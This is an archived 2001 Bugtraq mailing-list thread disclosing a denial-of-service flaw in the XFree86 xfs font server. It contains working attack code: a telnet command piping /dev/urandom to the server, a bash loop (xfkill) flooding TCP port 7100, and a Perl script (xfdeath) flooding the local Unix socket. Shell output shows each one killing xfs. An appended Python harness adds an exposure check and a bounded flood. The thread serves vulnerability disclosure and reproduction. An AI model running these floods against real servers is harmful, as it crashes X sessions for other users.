6599001 2001-06-06 16:31 +0200 /26 lines/ Jarosław Zachwieja <grok@mhd.pl>
Sent by: joel@lysator.liu.se
Imported: 2001-06-08 18:27 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17321>
Subject: XFree86-xfs-4.0.1-1 DoS
------------------------------------------------------------
From: Jarosław Zachwieja <grok@mhd.pl>
To: bugtraq@securityfocus.com
Message-ID: <01060616314900.14503@base.mhd.pl>
Hello,
xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0 seems
to suffer from a Denial of Service attack. To cause xfs to stop
responding to requests, try to do the following:
$ telnet victim xfs </dev/urandom
Repeat about 100 (or 1000) times and you get a Connection refused
message.
Regular Xservers can no longer connect, usually crash stating Could
not open default font 'fixed' and probably get disabled for 5
minutes if run from inittab.
I'd appreciate any successful/unsuccessful attempts at reproducing this
behaviour.
Regards,
--
Valentine M. Smith
(6599001) /Jarosław Zachwieja <grok@mhd.pl>/(Rewrapped)
6604891 2001-06-10 03:16 -0400 /79 lines/ Mathias Dybvik <tmdybvik@hotmail.com>
Sent by: joel@lysator.liu.se
Imported: 2001-06-11 02:21 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External copy recipient: grok@mhd.pl
Recipient: Bugtraq (import) <17360>
Subject: Re: XFree86-xfs-4.0.1-1 DoS
------------------------------------------------------------
From: "Mathias Dybvik" <tmdybvik@hotmail.com>
To: bugtraq@securityfocus.com
Cc: grok@mhd.pl
Message-ID: <F222dnHM3SOlbpH71yE00000542@hotmail.com>
Confirmed, on Mandrake 8.0.
I should, however, point out that I was only able to take down the
font-server as a local user, and not from a remote host. This could
be a bandwidth problem, caused by the fact that I only have a measly
10Mb/s LAN. Then again, my urandom bandwidth is less than half of
that, so I'm not sure what gives...
The moral of the story is that (at least) any local user can kill the
xfs process. This has dire consequences for any user either using X
on that box, or using an x-terminal relying on that fontserver.
[user@userland ~]$ ps -ax|grep xfs
9363 ? S 0:00 xfs -port 7100 -daemon -user xfs
9574 pts/1 S 0:00 grep xfs
[user@userland ~]$ ./xfkill
[user@userland ~]$ ps -ax|grep xfs
9626 pts/1 S 0:00 grep xfs
[user@userland ~]$ cat xfkill
#!/bin/bash
# xfkill: open 500 TCP connections to the xfs port and feed each one
# random bytes from /dev/urandom until the server closes it.
XFSPORT=7100
XFS_IP=192.168.1.254
for ((COUNT=0; COUNT<500; COUNT++)); do
echo "sending garbage to $XFSPORT pass $COUNT"
telnet "$XFS_IP" "$XFSPORT" </dev/urandom &>/dev/null
done
Version information:
$ rpm -qi XFree86-xfs
Name : XFree86-xfs Relocations: (not relocateable)
Version : 4.0.3 Vendor: MandrakeSoft
Release : 7mdk Build Date: Sun 08 Apr 2001 08
Install date: Mon 23 Apr 2001 09:32:49 PM UTC Build Host: bi.mandrake
Group : System/Servers Source RPM: XFree86-4.0.3-7mdk
Size : 536213 License: MIT
Summary : Font server for XFree86
>>>>>>>>>>>>>>>>>>Original Message <<<<<<<<<<<<<<<<<<
On 6/6/01, 2:31:49 PM, Jarosław Zachwieja
<grok@mhd.pl> wrote regarding XFree86-xfs-4.0.1-1 DoS:
>Hello,
>xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0 seems to
>suffer from a Denial of Service attack.
>To cause xfs to stop responding to requests, try to do the following:
>$ telnet victim xfs </dev/urandom
>Repeat about 100 (or 1000) times and you get a Connection refused message.
>Regular Xservers can no longer connect, usually crash stating Could not
>open default font 'fixed' and probably get disabled for 5 minutes if run
>from inittab.
>I'd appreciate any successful/unsuccessful attempts at reproducing this
>behaviour.
>Regards,
>--
>Valentine M. Smith
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
(6604891) /Mathias Dybvik <tmdybvik@hotmail.com>/(Rewrapped)
6608512 2001-06-11 00:53 -0400 /59 lines/ Mathias Dybvik <tmdybvik@hotmail.com>
Sent by: joel@lysator.liu.se
Imported: 2001-06-11 19:42 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External copy recipient: grok@mhd.pl
Recipient: Bugtraq (import) <17367>
Subject: Re: XFree86-xfs-4.0.1-1 DoS
------------------------------------------------------------
From: "Mathias Dybvik" <tmdybvik@hotmail.com>
To: bugtraq@securityfocus.com
Cc: grok@mhd.pl
Message-ID: <F98EybqfAj81EYtN3Is000056d0@hotmail.com>
I forgot to mention that the TCP attack against the font server is
(obviously) only applicable to font-servers listening to TCP. (Which
is probably only the case for systems serving x-terminals.) Thanks
to people who pointed this out.
If we want to kill a font-server running on the
Mandrake/Redhat/whatever *default* setup, we have to send the
garbage to the Unix-Domain socket instead.
I've only tested this on Mandrake 8.0; on my system it takes about
5-10 seconds before xfs dies. I apologize if the script is ugly,
I'm a PHB, not a developer, and the few lines below are more Perl
than I've written all year.
Mathias
[user@userland ~]$ ps -ax|grep xfs
3690 ? S 0:00 xfs -port -1 -daemon -user xfs
3723 pts/2 S 0:00 grep xfs
[user@userland ~]$ ./xfdeath
[user@userland ~]$ ps -ax|grep xfs
3780 pts/1 S 0:00 grep xfs
[user@userland ~]$ cat xfdeath
#!/usr/bin/perl -w
# xfdeath: connect to the xfs Unix-domain socket 1000 times and push one
# random byte at a time into each connection until the server drops it
# (we get SIGPIPE), then move on to the next connection.
use strict;
use Socket;

# Socket path may be given as the only argument; read it once, outside the
# loop (a shift inside the loop would only apply to the first connection).
my $path = shift || '/tmp/.font-unix/fs-1';
my $STOP = 0;
$SIG{PIPE} = sub { $STOP = 1 };   # server closed the socket on us
$| = 1;                           # unbuffered progress dots

open(my $garbage, '<', '/dev/urandom') or die "cannot read /dev/urandom: $!";

for (my $i = 0; $i < 1000; ++$i) {
    $STOP = 0;
    socket(my $sock, PF_UNIX, SOCK_STREAM, 0) or die "socket: $!";
    connect($sock, sockaddr_un($path)) or die "connect: $!";
    while (!$STOP) {
        read($garbage, my $byte, 1) or die "read: $!";
        print ".";
        # syswrite bypasses stdio buffering, so the EPIPE/SIGPIPE arrives on
        # the write that actually hits the closed socket, not thousands of
        # bytes later when a buffer happens to flush
        syswrite($sock, $byte) or last;
    }
    close($sock);
}
exit;
(6608512) /Mathias Dybvik <tmdybvik@hotmail.com>/(Rewrapped)
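Two things a practitioner reading this thread would want that neither xfkill nor xfdeath gives: a way to tell from an xfs command line and config file whether the font server is reachable over TCP at all (the second follow-up's point that the remote case only applies to servers listening on TCP), and a reproduction harness that stops as soon as connections start being refused and reports the count, instead of blindly looping 500 or 1000 times. The block below is an added example written for this page, not code from either poster. It assumes, from the xfs(1)/config(5) conventions rather than from anything stated in the thread, that a command-line `-port N` overrides a `port = N` config line, that a negative port such as the `-port -1` shown above disables TCP, and that `no-listen = tcp` in the config disables it regardless of the port; the socket path and port number are the ones the thread itself shows. `closed_peer` and `refusing_peer` are constructed offline stand-ins for a font server that drops or refuses connections, so the harness can be exercised without a real xfs.

```python
"""Exposure check and bounded reproduction harness for the xfs garbage-flood
DoS discussed in this thread (added example, not the posters' code)."""
import os
import re
import socket
import sys

DEFAULT_TCP_PORT = 7100                       # xfs default, as seen in the thread
DEFAULT_UNIX_SOCKET = "/tmp/.font-unix/fs-1"  # path used by xfdeath in the thread


def tcp_exposed(cmdline, config_text=""):
    """True if this xfs invocation accepts TCP connections.

    Assumed semantics (from xfs(1)/config(5), not stated in the thread):
    '-port N' on the command line overrides 'port = N' in the config, a
    negative port (the '-port -1' seen above) disables TCP, and
    'no-listen = tcp' in the config disables it regardless of the port.
    """
    if re.search(r"^\s*no-listen\s*=.*\btcp\b", config_text, re.M):
        return False
    m = re.search(r"(?:^|\s)-port\s+(-?\d+)", cmdline)
    if m is None:
        m = re.search(r"^\s*port\s*=\s*(-?\d+)\s*$", config_text, re.M)
    if m is None:
        return True  # neither given: xfs falls back to its built-in default
    return int(m.group(1)) >= 0


def flood_until_refused(connect, rounds, max_bytes=4096, chunk=64, timeout=2.0):
    """Open up to `rounds` connections with connect() and push random bytes
    into each until the peer drops it (or `max_bytes` have been sent).

    Returns (connections_made, refused): refused is True when a connect()
    failed before `rounds` was reached, i.e. the 'Connection refused'
    symptom the thread reports once xfs has gone away.
    """
    made = 0
    for _ in range(rounds):
        try:
            sock = connect()
        except OSError:
            return made, True
        sent = 0
        try:
            sock.settimeout(timeout)
            while sent < max_bytes:
                sock.sendall(os.urandom(chunk))
                sent += chunk
        except OSError:  # EPIPE / ECONNRESET / timeout: the peer is done with us
            pass
        finally:
            sock.close()
        made += 1
    return made, False


def still_accepting(connect):
    """Liveness probe: can a new connection still be opened at all?"""
    try:
        connect().close()
        return True
    except OSError:
        return False


def tcp_connect(host, port=DEFAULT_TCP_PORT):
    return lambda: socket.create_connection((host, port), timeout=2.0)


def unix_connect(path=DEFAULT_UNIX_SOCKET):
    def _connect():
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.connect(path)
        return s
    return _connect


def closed_peer():
    """Constructed offline stand-in for a server that drops the connection
    at once: one end of a socketpair whose other end is already closed."""
    a, b = socket.socketpair()
    b.close()
    return a


def refusing_peer():
    """Constructed offline stand-in for a dead font server."""
    raise ConnectionRefusedError("stand-in for a dead font server")


if __name__ == "__main__":
    # usage: xfs_flood.py tcp HOST [PORT]   or   xfs_flood.py unix [PATH]
    if len(sys.argv) < 2 or sys.argv[1] not in ("tcp", "unix"):
        sys.exit("usage: xfs_flood.py tcp HOST [PORT] | unix [PATH]")
    if sys.argv[1] == "tcp":
        port = int(sys.argv[3]) if len(sys.argv) > 3 else DEFAULT_TCP_PORT
        connect = tcp_connect(sys.argv[2], port)
    else:
        connect = unix_connect(sys.argv[2] if len(sys.argv) > 2 else DEFAULT_UNIX_SOCKET)
    made, refused = flood_until_refused(connect, rounds=1000)
    print(f"connections made: {made}, refused: {refused}, "
          f"still accepting: {still_accepting(connect)}")
```

Run it only against a font server you own. The per-connection byte budget matters: a server that keeps reading garbage without closing (which xfs apparently does not, but another daemon might) would otherwise hang the harness on the first connection, and the liveness probe after the loop distinguishes "stopped accepting" from "accepted everything and is still up".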